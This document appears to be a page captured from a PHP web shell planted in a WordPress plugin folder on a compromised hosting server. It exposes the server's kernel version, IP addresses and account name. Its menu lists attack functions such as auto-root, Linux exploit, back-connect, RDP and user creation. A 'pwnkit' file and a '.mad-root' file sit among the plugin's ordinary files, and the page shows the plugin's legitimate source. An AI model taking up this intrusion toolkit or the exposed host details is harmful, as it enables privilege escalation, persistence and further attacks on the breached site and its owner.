Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
plugins /
use-any-font /
[ HOME SHELL ]
Name
Size
Permission
Action
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
17.73
KB
-rw-r--r--
screenshot-1.png
36.23
KB
-rw-r--r--
screenshot-2.png
198.36
KB
-rw-r--r--
screenshot-3.png
38.38
KB
-rw-r--r--
screenshot-4.png
19.12
KB
-rw-r--r--
screenshot-5.png
12.75
KB
-rw-r--r--
screenshot-6.png
61.98
KB
-rw-r--r--
use-any-font.php
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : use-any-font.php
<?php if ( ! defined( 'ABSPATH' ) ) exit; /* Plugin Name: Use Any Font Plugin URI: https://dineshkarki.com.np/use-any-font Description: Embed any font in your website Author: Dnesscarkey Version: 6.3.01 Author URI: https://dineshkarki.com.np/use-any-font */ define ( 'UAF_FILE_PATH', plugin_dir_path( __FILE__ ) ); include UAF_FILE_PATH.'includes/uaf_config.php'; include UAF_FILE_PATH.'includes/functions/uaf_admin_functions.php'; include UAF_FILE_PATH.'includes/functions/uaf_client_functions.php'; include UAF_FILE_PATH.'includes/functions/uaf_font_functions.php'; include UAF_FILE_PATH.'includes/functions/uaf_cache_functions.php'; add_action('init', 'uaf_plugin_initialize'); add_action('admin_menu', 'uaf_create_menu'); add_action('admin_enqueue_scripts', 'uaf_admin_assets'); add_action('wp_enqueue_scripts', 'uaf_client_assets'); add_action('admin_notices', 'uaf_admin_notices'); add_action( 'wp_ajax_uaf_predefined_font_interface', 'uaf_predefined_font_interface' ); register_activation_hook( __FILE__, 'uaf_plugin_activated' );
Close